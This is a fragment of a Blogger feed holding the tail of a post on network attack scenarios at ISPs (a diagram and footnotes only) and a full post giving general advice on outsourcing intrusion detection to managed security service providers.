&lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                       &lt;/span&gt;| &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                    &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                    &lt;/span&gt;| Cust |&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                     &lt;/span&gt;&lt;span style=""&gt;               &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: 
Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                    &lt;/span&gt;Figure 4&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;The "Cust" machines are customer servers, with perhaps one or more of the&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;following scenarios:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;- owned by ISP, customer has no root access&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;- owned by ISP, multihomed, customers have no root access&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;- owned by customer, customer has root access&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;When the machine is owned by the ISP, there is a distinct possibility that&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;the ISP will try to confine the customer 
to a "safe"[5] environment.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Usually the customers are separated from each other on a switch with VLANs to&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;prevent them from attacking each other. However, if the theory described above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;works, there is no reason the tricks described in the attack section shouldn't&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;apply here.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;  &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;--&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;[1] Infamous scanner written by Fyodor (found at http://www.insecure.org).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;[2] Of course, as I disclaimed in the beginning, only if this theory works!!&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;[3] "-conf" is the usual extension used by Cisco router configurations.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;[4] Cisco Express Forwarding (http://www.cisco.com/univercd/cc/td/doc/&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span 
style="font-family: Arial;"&gt;&lt;span style=""&gt;    &lt;/span&gt;product/software/ios112/ios112p/gsr/cef.htm#xtocid262640). A layer 3 &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;    &lt;/span&gt;switching mechanism.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;[5] Probably exploitable.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/2347529749217098407/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=2347529749217098407' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2347529749217098407'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/2347529749217098407'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/network-flight-recorder-new-tool-for.html' title='Network Flight Recorder – A New Tool for the War'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' 
src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-1715603319865567997</id><published>2008-03-25T12:03:00.000-07:00</published><updated>2008-03-25T12:04:28.622-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Managed Security Services: an IDS solution</title><content type='html'>&lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;In this age of highly networked computers, e-business success can only be achieved by protecting valuable business assets: from the organization’s information, or research and development projects and highly skilled professionals that make it happen, to the IT infrastructure that we all have grown to depend on for all aspects of e-business. Protecting the organization’s assets is a matter of saving money and protecting well-guarded prestige. Such protection can only be achieved with a forward-thinking approach of planning, prevention and timely implementation of security measures. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Intrusion detection systems (IDSs) form an important component of this prevention and protection effort, as one layer in the defense in-depth approach, by aiding with automated monitoring and analysis of events in computer systems and networks. Like any other IT-based solution, it is only as good as the organization’s effort to implement, maintain and operate it. The core component for this operation is the analyst who actually makes sense of the numerous outputs and builds on previous experience to achieve the best tool of defense in this prevention/protection mechanism. 
&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Outsourcing as a solution&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Companies face a variety of challenges with the ever-changing technology on which their communications infrastructure is based, and with fulfilling the staff requirements to support it. Some organizations do not have enough IT staff, especially in the security arena, to spare even a few individuals to administer yet another system of computers. Network and system administrators are just too busy keeping the operations working. Other security professionals have to prioritize their resources toward looking at the bigger picture and planning other e-business initiatives, such as VPNs and PKI, essential to many organizations. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;For the highly enterprising security professional, doing the research to find the intrusion detection system implementation that best suits the organization’s needs, procuring the needed hardware and software, and installing IDS components is just the beginning. The initial research, acquisition and deployment are followed by numerous hours of data and correlation analysis, and by keeping up with IDS system updates, technology and the infrastructure that it is designed to protect. 
For the organization, owning the implementation of an intrusion detection system means capital investment in hardware and software, and requires around-the-clock staffing to respond to intrusions as real-time emergencies, a problem resolution escalation procedure, and specialists to fill the various levels of expertise required for operation, analysis and problem resolution.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Acquiring services from a managed security services provider (MSSP) comes as an alternative to the corporate investment in specialized hardware and software. Also, with the staffing limitations that many organizations face, the implementation of an intrusion detection system, given what was discussed earlier, may seem more a burden than a necessary step toward a comprehensive security solution. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;There is always room for entrepreneurial efforts that provide something that is needed to the organization that does not have the resources to implement and support an intrusion detection system. Still, management needs to task the security professional with defining what is wanted and required, and how to go about obtaining and supporting it.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;A word of caution for those exploring a managed security services provider as the IDS solution for the organization: do not confuse managed security services providers (MSSPs) with managed security providers (MSPs). The latter may provide many security-related services, but not necessarily installation, administration and monitoring of sensors, data analysis and incident forensics. 
Still, managed security providers may support the development and implementation of many security initiatives for which the organization does not have resources or in-house know-how.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Managed Security Services Providers as a Solution&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Managed security services providers supply hardware, software and services to manage and improve the organization’s network and system security. Hardware and software provide the basis for sensors or data collectors. Sensors may be network-based, collecting network packets as data, or host-based, collecting system log entries and/or operating system audit trail data. MSSPs provide services to design, deploy, manage and monitor an intrusion detection system for a customer organization that does not possess the staff or other resources to provide such an essential service for itself. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;At the core of managed security services monitoring is the security operations center (SOC), where data collected from the sensors is merged, normalized and analyzed. SOCs are staffed 24x7 with analysts as the first step in the escalation process of evaluating suspicious events registered by the intrusion detection system and determining an appropriate handling response. 
Various levels of analysis are applied to the data to determine whether an event is an actual intrusion incident: data mining and correlation techniques are performed, including aggregation of events and incidents recorded from other customer sites as well as global incident response centers.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;By the way, when it comes to monitoring, alert and incident handling coverage provided by the SOC, don’t think that services are any more comprehensive if a managed security services provider happens to mention that they provide 24x7x365 monitoring as opposed to simply 24x7. The 365 sounds impressive, but it adds neither meaning nor coverage. Actually, this could be a dangerous thing: consider what would happen to the 366&lt;sup&gt;th&lt;/sup&gt; day in a leap year…&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Considerations When Selecting an MSSP&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;There are many aspects to consider when selecting a managed security services provider. The organization must identify its security needs to find a provider that can meet them. Not every consideration will be important to every organization; that depends on the resources needed and wanted. &lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Your organization and the selected MSSP will draw up a service level agreement, which determines the level and quality of service to be provided by the MSSP and what is expected from the organization. The service level agreement needs to be negotiated in advance for a clear understanding of services and cost. 
&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;MSSPs offer various pre-packaged service level agreements that might fit your organization’s needs or can be customized to its specific needs.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Here are some aspects to consider on the road to identifying the organization’s requirements and selecting a managed security services provider:&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Technology. Managed security services providers offer a variety of technical solutions through software and hardware from various vendors. The solution that is best for your organization will be largely dependent on how much control or hands-on involvement your organization wants, requires and can afford. Another aspect of the same issue is how much the managed security service provider is able to provide. The two hold an inversely proportional relationship. The systems and network infrastructure where the IDS will reside is a determining factor as well.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 5pt 36pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Consider some details on the technical requirements:&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Network-based sensor deployment and support. 
Network speed must be taken into consideration since sensors need to keep up with the data that they are trying to collect.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Host-based sensor deployment and support. Host-based sensor analysis is another aspect of defense in depth; therefore, it should be an integral part of the IDS and the data correlation analysis performed.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Sensor management. 
Hands-on support in your organization and the MSSP’s technical capacity to remotely manage sensors are factors in this matter.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Sensor signature upgrade capabilities and timing. Depending on the specific implementation, the product(s) deployed may have capabilities for signature development. Signature updates can be supplied by the IDS software vendor or by MSSP support for quick implementation and protection.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;System tuning. System tuning is an ongoing process to minimize false positives, which is essential to focus efforts on actual intrusions. 
MSSPs may consider a pilot phase to establish a base level of event activity that would be used for an initial fine-tuning of the system.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;System scalability. Even in a modest IDS initial deployment, the planning for future sensor deployment and integration should be considered from the start by the organization.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Technical training. If your MSSP provides basic monitoring and alerting, based on your service level agreement, technical training may be required for your organization’s analyst who is left with many tasks to support hardware and software components, signature updates and development, and basic sensor maintenance. &lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Reporting. 
There are two types of reporting that an organization should consider:&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Alert reporting. There are some choices or requirements that may need to be implemented to comply with the organization’s policies: phone notification, e-mail notification, paging, SNMP trap and web portal notification. Timing of alert notification must certainly be considered and can be related to already developed incident handling policies and procedures.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Statistical and other reporting. Even when the managed security services provider is doing the analytical work and correlation, a conscientious analyst in your organization still gains many benefits from knowing what types of events are being detected by the intrusion detection system, in order to plan for better security measures. 
A secured web portal interface can aid the analyst in this task by providing statistical reporting while protecting the information being shared. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 5pt 108pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Incident handling reporting also may help the analyst in the effort to document the organization’s intrusion incidents and to justify future acquisition and implementation of security measures, in addition to the current MSSP expense. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 5pt 108pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Regular monthly reports are a good way to keep abreast of IDS upgrades and can provide security advisories for newly discovered threats.&lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Incident handling and forensics. Support may extend beyond monitoring and alerting. Data forensics is needed to understand the event, the extent of any damage done, possible fixes and mitigation steps. This aspect will depend on the organization’s incident and escalation procedures for intrusion incidents. The organization may also need on-site support in case of an intrusion incident and possible legal counseling and support.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Company’s assessment. 
&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;On their own or with a partner. MSSPs may provide the whole range of services themselves or partner with another company to supplement the security services for their customers.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Corporate history and growth. Knowing how long the company has been established as an MSSP, its number of employees, and its growth over time may give the organization some perspective on what to expect, especially if the organization plans to expand services beyond the initial deployment. 
Also, having an idea of the MSSP’s other corporate customers would provide some comfort level on the MSSP’s background and capabilities to satisfy the organization’s needs.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Location and operations. Location may be a factor if your organization requires on-site support because travel expenses will be reflected in the cost of services. Inquire about SOC redundancy of operations since your organization will entrust a critical component of security to the MSSP.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Personnel background. MSSPs take great pride in having on board former employees from the Department of Defense and other government agencies that specialize in intelligence work. Many analysts may also hold current certifications available for security professionals. 
In addition, it is wise to understand or require a certain level of background checks and/or clearances for analysts and staff that will be supporting your organization’s security efforts.&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Security services beyond IDS. To complement intrusion detection system monitoring, MSSPs facilitate development of security policies and procedures, as well as a more proactive approach to security measures to determine and correct vulnerabilities before an intruder exploits them. This proactive approach includes vulnerability assessment/scanning and penetration testing:&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;ul type="disc"&gt;&lt;ul type="circle"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Vulnerability assessment/scanning. Assessing the strength and implementation of security controls on systems and networks can be performed with vulnerability assessment tools. Some of these tools are active in nature because they identify vulnerabilities using exploit techniques. &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;  &lt;p style="margin: 5pt 108pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Other vulnerability assessment may be performed in a passive mode, where security weaknesses may be encountered by reviewing security measures developed and implemented by the organization such as security policies and procedures, access controls, and roles and responsibilities. Even when data needs to be gathered from production systems, the tests are performed off-line without affecting the systems’ performance. 
&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 5pt 108pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Both types of vulnerability assessment may assess important security controls such as password strength, file systems protection, system security-related bug-fixes and access control lists. &lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;ul type="circle"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Penetration testing to find security holes before intruders do is always good practice. Your organization may prefer to have the penetration testing performed by a third party company. This will test not only for security weaknesses in targeted systems but also the intrusion detection system implementation.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;  &lt;p style="margin: 5pt 108pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;The scope of any penetration testing and vulnerability assessments to be performed should be identified in advance to minimize impact to the systems and networks being tested.&lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Cost. This will greatly depend on the service level agreement your organization develops with the selected MSSP. Service level agreements range from simple sensor monitoring and alerting to sensor implementation design and deployment, incident forensics, vulnerability assessments, penetration testing and others indicated in this document. &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 5pt 72pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Consider the number and type of sensors to be deployed and monitored, and the extent of the initial targeted IDS implementation. 
There could be a significant difference in the cost of host-based versus network-based sensors, and in how extensive the support requested from the MSSP to maintain the IDS is.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 5pt 72pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;MSSPs also provide hours of consulting services to satisfy customers’ other security needs in an effort to provide comprehensive security services.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Some final thoughts&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;There is a wide range of outsourcing alternatives to implement an intrusion detection solution that fits your organization’s needs. Managed security services providers satisfy many requirements with specialization and solid expertise in the security field. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Selecting a managed security service provider may prove to require a lower initial investment and allow faster deployment than a solution developed and supported only with in-house resources, because of the high cost of ownership of an in-house solution.&lt;/span&gt;&lt;/p&gt;  &lt;span style="font-size: 10pt; font-family: Arial;"&gt;The organization needs to decide between technical and policy requirements, in addition to budget and technical constraints, to find and acquire the provider best suited for the job at hand. 
